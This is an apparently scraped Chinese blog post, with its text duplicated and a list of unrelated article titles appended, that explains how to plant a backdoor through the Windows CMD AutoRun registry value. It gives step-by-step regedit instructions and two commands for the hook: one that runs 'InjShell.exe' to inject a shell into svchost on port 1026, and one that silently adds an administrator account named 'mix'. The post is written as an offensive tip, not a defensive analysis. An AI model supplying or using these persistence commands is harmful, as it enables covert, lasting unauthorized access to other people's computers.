后门
来源:互联网 发布:淘宝登陆界面无法显示 编辑:程序博客网 时间:2024/06/08 14:43
Mix老装一幅正人君子的样子,说写文档,哼哼。。。。
无聊,cmd /?后看见好多东西,其中有个好玩的:
*******************
如果 /D 未在命令行上被指定,当 CMD.EXE 开始时,它会寻找
以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或
两个都存在,这两个变量会先被执行。
HKEY_LOCAL_MACHINE/Software/Microsoft/Command Processor/AutoRun
和/或
HKEY_CURRENT_USER/Software/Microsoft/Command Processor/AutoRun
******************
呵呵,又是一个放后门的好地方。我用@c:/InjShell.exe svchost.exe 1026 >nul 后,打开CMD什么异常现象都没有(当然不包括c:/InjShell.exe)。如果用net user mix /add & net localgroup administrators mix /add 岂不是成了《不死帐号》续集?大家自己琢磨吧~~~
有人问具体的做法,随手写写,还不懂的话,就是我的表达能力有问题了 :)呵呵
先用regedit打开HKEY_LOCAL_MACHINE/Software/Microsoft/Command Processor或HKEY_CURRENT_USER/Software/Microsoft/Command Processor ,看见这个主健下是不是有AutoRun健,将AutoRun键值改为你想要得命令即可。比如我上面用的用@c:/InjShell.exe svchost.exe 1026 >nul ,有人使用cmd的话,就会自动执行你设置的命令。
无聊,cmd /?后看见好多东西,其中有个好玩的:
*******************
如果 /D 未在命令行上被指定,当 CMD.EXE 开始时,它会寻找
以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或
两个都存在,这两个变量会先被执行。
HKEY_LOCAL_MACHINE/Software/Microsoft/Command Processor/AutoRun
和/或
HKEY_CURRENT_USER/Software/Microsoft/Command Processor/AutoRun
******************
呵呵,又是一个放后门的好地方。我用@c:/InjShell.exe svchost.exe 1026 >nul 后,打开CMD什么异常现象都没有(当然不包括c:/InjShell.exe)。如果用net user mix /add & net localgroup administrators mix /add 岂不是成了《不死帐号》续集?大家自己琢磨吧~~~
有人问具体的做法,随手写写,还不懂的话,就是我的表达能力有问题了 :)呵呵
先用regedit打开HKEY_LOCAL_MACHINE/Software/Microsoft/Command Processor或HKEY_CURRENT_USER/Software/Microsoft/Command Processor ,看见这个主健下是不是有AutoRun健,将AutoRun键值改为你想要得命令即可。比如我上面用的用@c:/InjShell.exe svchost.exe 1026 >nul ,有人使用cmd的话,就会自动执行你设置的命令。
- 后门
- 后门
- 后门
- 谈谈后门
- Bind后门
- 后门程序
- 软件后门
- 隐蔽后门
- mysql后门
- 放大镜后门
- 后门攻击
- Linux后门
- Linux后门
- 蜘蛛后门
- cmd后门
- sethc后门
- linux后门
- 操作系统后门
- 一个小议题:火烧山时,如何判断发生火灾的具体的范围(引子)
- IBM websphere workflow工作流脚本应用
- 手把手教你写批处理
- 软件性能测试中常注意的事项
- JAVA程序员必读:基础篇(5)---类和继承
- 后门
- JAVA程序员必读:基础篇(6)---接口和包
- 批处理文件的应用
- 软件缺陷分析
- 重构的再一次深入理解
- oracle分析函数(转)
- 通杀Windows用户态进程的命令
- 通用类库
- Using legacy plug-ins with .NET